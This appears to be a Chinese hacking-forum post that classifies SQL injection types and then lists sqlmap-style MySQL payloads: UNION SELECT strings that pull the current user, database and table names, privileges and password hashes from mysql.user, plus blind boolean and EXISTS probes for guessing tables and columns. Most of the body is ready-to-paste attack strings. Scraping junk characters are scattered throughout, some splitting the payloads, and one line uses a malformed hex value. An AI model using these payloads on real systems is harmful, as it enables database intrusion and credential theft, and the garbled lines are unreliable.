放假第一天,本应该好好放松一下,可是还是想着把文章写完先。。。
( k+ j I) `# m# X7 y: d - c4 O: H7 N7 G# _1 t' b) j: z
这次的主题是高级注入,坛子里也讲到了一些,不过本文旨在给大家一个更深刻的概念和全面的理解,下面看看我自己列的一个表
" u) r D% I$ Q, L# a ! m: O) z6 _6 I! B0 w
分类标准 分类 备注
. k8 X" D6 W& f; o0 y0 K: {4 Z按字段类型 整型注入,字符型注入
1 `4 I7 W& z) f按出现的位置 get注入,post注入,cookie注入,http header注入 ) k$ R2 \! L) V( p, F
然而高级注入是这样的
6 {& U- X+ g8 J& z" h9 }8 B+ J
6 W, n% }; `0 \$ Y5 J% N) R高级注入分类 条件
7 S' U' v0 F& H1 i* w- _; n# aerror-based sql 数据库的错误回显可以返回,存在数据库,表结构
0 @* V% p0 n3 | y! M- Dunion-based sql 能够使用union,存在数据库,表结构% c) d1 Q9 N: |
blind sql 存在注入
' a, y$ x8 o1 Y' @我们暂且不考虑waf等的影响,只从原理上学习。通过上面我们不难发现,三种高级注入选择的顺序应该是eub(第一个字母,后面为了方便我都这样表示了 ),实际上,e是不需要知道字段数的,u需要知道字段数,e之所以在前我觉得主要是因为这个,因为在其他方面它们没有本质的区别,它们都需要知道数据库以及表的结构,这样才能构造出相应的语句,当然,能e一般能u(没过滤union等),反过来却很不一定,因为一般会有自定义的错误提醒。如果没有结构,那么就回到了最悲剧,最麻烦的b了,猜。。。当然可能没有结果,但是如果只是不能使用u,有结构,b还是能出结果的,只是苦逼点而已。。。
; f% I+ E3 \2 V' @0 r
/ p. |2 J) z; C6 f& z6 B5 j好了,说了这么多,该上神器sqlmap了,最近坛子里貌似很火
- {% i, b. ~( l) ], V " b7 r1 [! d5 l; ?, T
附件分别以mysql和mssql为例子,提醒:sqlmap中使用-v 3可以查看每个请求的payload。
+ u) p# i6 d: e6 l& k5 U, M: O
3 ^: W6 w/ D' h6 i3 L/ a& H这里用mysql说明6 ^# C6 B9 Q9 K
. u& ~6 @# T+ H, {% x3 \- ae注入坛子里很多了,请看戳我或者再戳我5 @# g9 h6 _4 W
' m H! V; D$ r
u注入其实也很多了,这里就大概帖上一些重要语句吧,附件上结合例子都有的
3 j# u" Q# r8 n # D7 r: J6 i( I) g
获取当前数据库用户名- m% q) S: V# k, v) D N
" [1 _8 T# ~* S* G$ g! d; f z
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(C
P/ d7 }4 b- z& o- ^AST(CURRENT_USER() AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NUL
7 T, ~1 f% M: p$ g, k, O! pL, NULL#8 f9 A( _' M/ S/ s4 i
注意concat那里不是必须的,只是sqlmap为了自动攫取出数据加上的特征,下面语句类似,涉及基础性的知识,基友们自己去补吧。, r. P/ ?/ Q6 s+ W, a$ [) h
. A Z( I1 [ }& u! m获取数据库名6 V6 v; N& K8 ~8 A
0 A9 Q" l8 ], t0 j! q( _8 DUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(DATABASE() AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#
$ t k: v1 C8 i' g, q( p+ k9 [( t获取所有用户名
. I: k# r& L$ V% L$ X* f0 u0 t / z; X9 N A6 B3 J! C, M d
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(grantee AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.USER_PRIVILEGES#
: {$ W2 i& d* Z( D; Y: V查看当前用户权限! D E ^/ i; x! g5 d% g
2 r3 t4 X8 A* qUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(grantee AS CHAR),0x20),0x697461626a6e,IFNULL(CAST(privilege_type AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.USER_PRIVILEGES#. i- A, M+ z- u. j# { E4 X; I1 |
尝试获取密码,当然需要有能读mysql数据库的权限
9 F* `: Q0 w y3 y2 Q K$ v 7 V8 o$ |3 Q$ C6 L5 M* {
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(user AS CHAR),0x20),0x697461626a6e,IFNULL(CAST(password AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM mysql.user#
9 c; L5 J$ s# d获取表名,limit什么的自己搞啦
) ~5 L I3 O, w # H" b8 j, [# c
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(table_name AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.TABLES WHERE table_schema = 0x7061727474696d655f6a6f62#" |" m( G4 Q$ l
获取字段名及其类型" [( [ B5 j& _# p
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(column_name AS CHAR),0×20),0x697461626a6e,IFNULL(CAST(column_type AS CHAR),0×20),0x3a6864623a),NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x61646d696e5f7461626c65 AND table_schema=0x7061727474696d655f6a6f62 AND (column_name=0x61646d696e6e616d65 OR column_name=0x70617373776f7264)#9 `$ t3 @; T4 G( z# \* u
* e. }4 V. g$ A/ R
b注入,呵呵,除了当前用户,数据库,版本可以出来,而如果不能u,但存在数据的结构表,还是能苦逼出来,否则猜也不一定能猜到表和字段,内容自然也出不来,苦逼access啊。。。
* l' n) H- `3 c6 Z o - K, S$ w6 x& j
如:2 u: V$ A W. ~/ t0 M- x
获取当前用户名4 p y* q+ J+ T' T+ v/ v% M( ~
1 `" b& ~+ f4 e# p0 I& fAND ORD(MID((IFNULL(CAST(CURRENT_USER() AS CHAR),0x20)),1,1)) > 116
- L5 |# e; V: S) f, q6 D/ a: a# |获取当前数据库6 a5 [1 X! K: \
% Y4 c; d5 N1 v% H, }
AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),6,1)) > 106
' S, C8 U% y; a! p获取表名
3 e) O; A0 r! b3 J
8 f. w! k( P2 UAND ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7061727474696d655f6a6f62),1,1)) > 51
& Q& G4 u/ R/ L! h3 e获取字段名及其类型和爆内容就不说了,改改上面的就可以了。
( v( I, L* o1 M( n回到最苦逼的情况,无结构的,mysql版本<5.0,现在不多见了吧,还是看看语句。) D% E( t9 G2 Q8 A
爆表
4 i V. e2 F* e% U* ^ ( s H& y( \5 {2 O. X' ^
AND EXISTS(select * from table)
8 o9 T# U( U' N% v9 z6 {6 C爆字段; y# \7 ?2 u: w% {3 ?) D- }
: ?; y. N$ _ ^/ h- \AND EXISTS(select pwd from table)8 E& v( n( c' ~$ i
盲注的变化就比较多了,由于篇幅,只是举个例子而已。
, U% _; F; ^, U
- G1 A: {7 S9 G$ h本来想把mssql和access都写上的,不过编辑得太累了,有时间再写吧,其实原理都差不多,今天就洗洗睡了吧。6 l' C* _1 u2 B6 V
|